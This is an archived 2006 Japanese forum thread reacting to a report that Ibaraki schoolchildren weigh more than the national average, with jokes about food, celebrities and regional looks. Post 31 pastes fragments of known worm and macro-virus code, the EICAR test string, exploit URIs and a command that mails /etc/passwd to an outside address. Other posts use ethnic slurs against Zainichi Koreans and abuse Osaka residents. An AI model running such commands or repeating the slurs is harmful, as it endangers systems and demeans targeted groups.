5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

茨城っ子はデブが多い

1 :かしわ餅φ ★:2006/12/24(日) 17:42:10 0
男子の体重は全年齢で全国平均以上、女子の体重も16歳を除く全年齢で全国平均以上で、
県内の子供の「肥満化」が、県企画部統計課がまとめた平成18年度学校保健統計調査結果
速報で明らかになった。

 調査は学校の児童、生徒および幼児の発育・健康状態を明らかにして、学校保健行政上の
基礎資料を得ることを目的に、県内の小学校、中学校、高校、幼稚園に在籍する満5〜17歳の
一部を抽出して調査した。

 その結果、身長は男女ともに6、14、16歳を除く各年齢で全国平均以上を記録した。中でも
男子の17歳(171.5センチ)は平成9年度と同値の過去最高だった。

 体重は男女ともに肥満化が進行しており、男子17歳(65.1キロ)は全国平均(63.9キロ)を
大きく上回るなど、県内で肥満児が多いことが浮き彫りになった。

 座高は男子は5〜12歳、女子は5、7〜13歳で全国平均以上だった。男子の11歳(78.2
センチ)は11、12年度と同値で過去最高、女子の15歳(85.2センチ)も過去最高だった。

(2006/12/24 04:17)
茨城|地方|Sankei WEB
http://www.sankei.co.jp/chiho/ibaraki/061224/ibr061224002.htm

2 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 17:44:08 0
虐待が原因

3 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 17:44:36 0
納豆ばかり食ってるのに…。

4 :名無しさん@恐縮です :2006/12/24(日) 17:45:39 0
デブ大久保を育てた

5 :田中花道 ◆s/jzHQWa8Q :2006/12/24(日) 17:47:05 O
⊂二二( ゚|゚)二⊃<なんとなく納得

6 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 17:47:50 0
渡辺徹も茨城だっぺ?

あと、アテネで金をとった柔道の女子選手

7 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 17:49:28 0
デブかどうかは知らんが
恐ろしく美人がいない県

8 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:04:50 0
170CM
49KG
で17の俺は負組

9 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:07:19 0
>>7
永作博美がいたっぺ

10 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:11:32 0
永作博美レベルかよ?wwww

11 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:13:22 0
干し芋の食べすぎだwwwww

12 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:14:14 0
ブサの多さなら大阪民国がダントツ
正視に耐えないキモヲタが大阪にはうようよいる

13 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:19:02 0
餃子の食べすぎか

14 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:20:33 0
井川、大久保、マギー司郎

15 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:22:26 0
>>13
餃子は、栃木の宇都宮だよ

「茨城」は「いばらき(IBARAKI)」が正しいのだが
「いばらぎ(IBARAGI)]と言うのは、茨城人が訛るため。

16 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:22:45 0
>>12
関西人はデブ率も高いぞ
体型は友近、顔は山田花子が関西人の標準レベルだ

17 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:24:12 0
そういえば水戸泉も稀勢の里も太っているな

18 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:24:44 0
養豚場か

19 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:24:59 0
>>15
茨城も栃木も区別つかないwwwww
鳥取と島根もどっちでもいい

20 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:27:46 0
栃木って群馬だっけ

21 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:30:47 0
関西弁きんも〜☆

22 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:31:11 0
茨城って県北は東北地方みたい

23 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:31:49 O
ソウルって大阪だっけ?

24 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:34:18 0
>>23
そんな気持ち悪いモノ大阪にはありません。
大阪は日本人のもの。
在日はもうすぐ強制送還で出て行くの!!!

25 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:39:52 0
北関東の連中はヘンにプライド高いよなw
田舎を売りにできるほど田舎でもないし、
都会というには程遠いってのは不幸なのかもしれない。


26 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:41:48 0
>>24はAIKO似
大阪民国では絶世の美女
東京に出て来たら下の下

27 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:45:43 0
ヒマンジって映画あったな

28 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:46:58 O
>>9-10
栗山千明がいるじゃん。
彼女も確か茨城。

29 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:48:46 0
覚せい剤も多いってね

30 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:50:27 0
>>19
ゆとりか

31 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:57:01 0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

32 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:01:19 0
この季節、アンコウ鍋の食いすぎだろう。

33 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:04:52 0
っ茨城に限らんが田舎は出掛けないし 余り人の目気にしない
親が甘やかし杉 と夕飯時にコンビニのレジで見たのが子供も
老人も夕飯の材料コンビニで買ってるのが信じられん

34 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:09:11 0
オラいばらきっ子だべ!160の45だべ。
喧嘩売ってんならブチのめすべ

35 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:14:00 O
MAXコーヒーの飲みすぎだろ

36 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:16:08 0
>>28
あと白石みほもそうだべ。
ってか、茨城出身の芸能人ってそんないなくねーか?

37 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:16:43 0
>>35
あるあるあrwww

38 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:24:24 0
>>22
その通りかも。 文化的には福島に近いのと、山や野に植わっている木や草などが東北南部と殆ど同じ。
見た目には東北南部と茨城北部はさほど変わりなし。
っていうか今の都道府県の区切りがおかしいだけだ。

39 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:31:03 O
磯山さやかも茨城県出身だね。

40 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:59:57 O
>>1何を根拠に茨城にケチつけてんの?いじやけっからやめろや。おめーみてーなでれすけがいっから茨城舐められちまうんだよ。
そっとしといてくれたらよかっぺよ。別に田舎って言われてもなんちゃねぇけどね。じゃっかねー。

41 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 20:06:00 0
しかも糸を引く

42 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 20:13:47 O
>>41
巧いっ

43 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 21:04:55 0
やっぱり食文化だろうなぁ。

そうでなければ車社会か。近場でも親が子供を車で送ることが多いと思う。

44 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 21:51:30 O
茨城のヤツが「茨城の女は異常に脚が太い」って言ってたけど
本当みたいだな。

45 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 22:05:32 0
>>44
いやいやいや、んなことねーよ。

46 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 22:19:34 O
>44
俺、茨城産まれの茨城育ちで茨城在住だけど
確かに異常に太い奴もいるのは居る。
もちろん、細いのも居るが。
県北はわがんねーけどよ?
俺、県南に住んでっからよ
>41
じゃっかねーって何だか?

47 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 22:37:54 O
俺、茨城の18才だが
身長170
体重58

これでも周りからデブ扱いだぜ?

48 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 23:01:49 0
仕事で結構多くの都道府県庁所在地に行きましたが、
見かけた女子高生のレベルが高かったのは松山市。
小顔の女の子が多かった。
水戸は・・・まぁ・・・そうですね。

49 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 23:07:37 O
>47
お前みたいなヤツを「風船デブ」っていうんだ。

50 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 23:13:08 0
三大ブスの産地
仙台・水戸・名古屋

51 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 23:49:20 0
何だっけ、江戸時代だかに着物の購入量が京を抜いて全国1位だったから
「ブスだから着飾らなきゃいけないんだろうwww」
ってことで三大ブスの産地の一つとされたんだっけ?>水戸
他の仙台と名古屋の理由わかる人いる?

52 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 01:13:26 0
ぽちゃーりマニアの漏れが来ましたよ。

53 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 01:25:42 0
確か名古屋は女性に守銭奴が多く、
お金に執着する姿があまりにも醜いので、
名古屋はブスの産地だと呼ばれていた。…らしい。

54 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 01:26:59 O
>>51
理由云々じゃなくて、仙台は実際にブスが多い。

55 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 01:30:10 O
茨城は農家が多いから、いい米がとれるんじゃないの?
なんだかな〜

56 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 02:05:26 0
三大ブス産地

水戸:着物の購入量が京都を抜いて全国一位だから
「どうせブスだから着飾らなきゃいけないんだろ?」と、
あてつける様な感じでブス産地の一つとなった。>>51
名古屋:守銭奴が多く、金に執着する姿が醜いとしてブス産地の一つとなった。
別に顔がブスなのが多いと言うわけではない。>>53
仙台:実際にブスが多い。>>54

57 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 02:17:46 O
当時支配していた佐竹氏が関ヶ原で西軍に味方したために、秋田に転封になるとき美人をごっそり秋田に連れて行ってしまったため、普通以下の女ばかり残ってしまった。

ってのが水戸がブスばかりと言われるようになったんじゃ?

58 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 02:53:19 0
>>16
友近は愛媛

59 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 03:00:20 O
茨城は日本国外でありまし。

60 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 03:39:10 0
>>56
ブスの産地はダントツで大阪だ
とにかく大阪女は悲惨
醜く、低学歴で、嘘吐き、しかもワキガ

ぜったいに関わるなよ、大阪人とはな。

61 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 03:45:32 O
いとこの大ちゃんもデブ
茨城に住んでる

62 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 04:36:08 0
三大ブス産地+α

水戸:着物の購入量が京都を抜いて全国一位だから
「どうせブスだから着飾らなきゃいけないんだろ?」と、
あてつける様な感じでブス産地の一つとなった。>>51
名古屋:守銭奴が多く、金に執着する姿が醜いとしてブス産地の一つとなった。
別に顔がブスなのが多いと言うわけではない。>>53
仙台:実際にブスが多い。>>54
大阪:日本一のブス産地。醜く、低学歴で、嘘吐き、しかもワキガ。>>60

63 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 04:39:39 0
>>57
秋田は美人が多いって言けど、それが本当なら今の秋田の美人のルーツは
茨城県人になっちゃって面白くないから省く。

64 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 10:32:05 O
名古屋がブスばかりなのは有名だよね。

65 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 11:06:21 O
日本ほどブサイクが多い国はない。

66 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 11:23:16 O
>>65
こんにちは、鮮人

67 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 11:23:51 0
大阪ほどブサイクが多い県はない。

68 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 14:40:59 0
からくりTVでは、茨城県南部特に土浦周辺出身の、
子供やサラリーマンを取り上げることが多い。

69 :猫王 ◆JvoKObe9Tk :2006/12/27(水) 00:29:49 0
確かに、昔付き合ったのに茨城が

70 :オレオレ!オレだよ、名無しだよ!!:2006/12/27(水) 00:43:27 O
あ…
茨城出身の同期二人ともデブだ…

71 :オレオレ!オレだよ、名無しだよ!!:2006/12/27(水) 00:48:04 0
日立は赤字

日立市内では日立製作所の社員は村八

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)